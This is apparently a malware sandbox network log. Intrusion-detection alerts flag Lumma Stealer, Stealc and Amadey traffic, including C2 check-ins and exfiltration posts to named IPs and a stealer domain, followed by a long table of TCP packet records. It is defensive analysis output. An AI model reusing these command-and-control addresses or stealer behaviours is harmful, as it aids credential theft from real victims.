                                                                                                                                                                                                                                              2024-11-02T07:16:22.674369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463873188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:23.351438+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.463873188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:24.217434+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463884188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:24.217434+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463884188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:26.239491+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463896188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:26.239491+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463896188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:26.522216+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.463895185.215.113.4380TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:27.760726+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.463898185.215.113.1680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:29.325555+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463909188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:29.325555+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463909188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:29.638691+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.463908185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:29.937001+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.463908185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:29.952069+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.463908TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:30.235267+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.463908185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:30.255276+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.463908TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:31.434601+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.463908185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:31.633056+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463923188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:31.633056+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463923188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:32.035833+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.463908185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:33.062501+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.463931185.215.113.4380TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:34.038855+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.463937185.215.113.1680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:38.765975+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.463970188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:38.765975+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.463970188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:39.228519+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.463970188.114.96.3443TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:40.185875+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.463979185.215.113.1680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:44.068170+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.464006185.215.113.4380TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:55.283955+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.464038185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:16:58.862023+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.464038185.215.113.20680TCP
                                                                                                                                                                                                                                              2024-11-02T07:17:00.858615+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.464038185.215.113.20680TCP
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Nov 2, 2024 07:14:58.651426077 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.221338987 CET6371153192.168.2.4162.159.36.2
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.226218939 CET5363711162.159.36.2192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.226298094 CET6371153192.168.2.4162.159.36.2
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.226361036 CET6371153192.168.2.4162.159.36.2
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.231537104 CET5363711162.159.36.2192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.830738068 CET5363711162.159.36.2192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.831559896 CET6371153192.168.2.4162.159.36.2
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.836591959 CET5363711162.159.36.2192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:28.836658001 CET6371153192.168.2.4162.159.36.2
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.699419022 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.699451923 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.699508905 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.699769974 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:53.699781895 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.433787107 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.433852911 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.435379982 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.435389996 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.435587883 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.444046974 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.487334967 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.670000076 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.670022011 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.670036077 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.670121908 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.670133114 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.670255899 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.688743114 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.688759089 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.688888073 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.688894987 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.688994884 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.787991047 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.788007975 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.788188934 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.788197041 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.788239956 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.806072950 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.806088924 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.806140900 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.806147099 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.806186914 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.807950020 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.807966948 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.808000088 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.808005095 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.808043003 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.808043003 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.809746981 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.809762001 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.809828043 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.809834003 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.809873104 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.906126022 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.906141996 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.906275034 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.906280994 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.906392097 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925084114 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925100088 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925179958 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925208092 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925254107 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925482988 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925499916 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925544977 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925551891 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.925592899 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.926362038 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.926383018 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.926426888 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.926433086 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.926462889 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.926489115 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.927877903 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.927895069 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.927989006 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.927995920 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.928085089 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.929681063 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.929694891 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.929791927 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.929797888 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.929883003 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.930356979 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.930372000 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.930469036 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.930474997 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:54.930563927 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.022854090 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.022914886 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.022983074 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.023114920 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.023332119 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.023343086 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.023375988 CET63716443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.023380041 CET4436371613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.066692114 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.066716909 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.066781044 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.067661047 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.067678928 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.067732096 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.068034887 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.068047047 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.068121910 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.068133116 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.069250107 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.069257975 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.069300890 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.069443941 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.069456100 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070172071 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070241928 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070290089 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070691109 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070719004 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070765972 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070811033 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070846081 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070873976 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.070884943 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.797635078 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.798121929 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.798144102 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.798559904 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.798566103 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.804761887 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.804975986 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.804991007 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.805274010 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.805279016 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.824033022 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.824892044 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.824898958 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.825447083 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.825452089 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.829866886 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.830311060 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.830328941 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.830940962 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.830945969 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.830984116 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.831415892 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.831435919 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.831739902 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.831743956 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927295923 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927376032 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927424908 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927656889 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927670956 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927681923 CET63718443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.927685976 CET4436371813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.931113958 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.931135893 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.931190968 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.931512117 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.931523085 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.935980082 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936006069 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936050892 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936064959 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936075926 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936094999 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936115026 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936156034 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936165094 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936172009 CET63717443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.936176062 CET4436371713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.938041925 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.938060045 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.938112020 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.938304901 CET63723443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.938314915 CET4436372313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953178883 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953228951 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953277111 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953284025 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953320026 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953366995 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953411102 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953661919 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953668118 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953675985 CET63719443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.953679085 CET4436371913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.956396103 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.956419945 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.956468105 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.957252026 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.957262993 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.963906050 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.964067936 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.964116096 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.964173079 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.964173079 CET63720443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.964196920 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.964220047 CET4436372013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967392921 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967499971 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967564106 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967706919 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967722893 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967761993 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967770100 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967820883 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.967859030 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.968588114 CET63725443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.968626976 CET4436372513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.968650103 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.968657017 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.968664885 CET63721443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.968668938 CET4436372113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.970823050 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.970834017 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.970881939 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.970989943 CET63726443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:55.970994949 CET4436372613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.691199064 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.691418886 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.694144011 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.694164038 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.697405100 CET63724443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.697410107 CET4436372413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.697637081 CET63722443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.697679043 CET4436372213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:56.701056004 CET63722443192.168.2.413.107.246.45
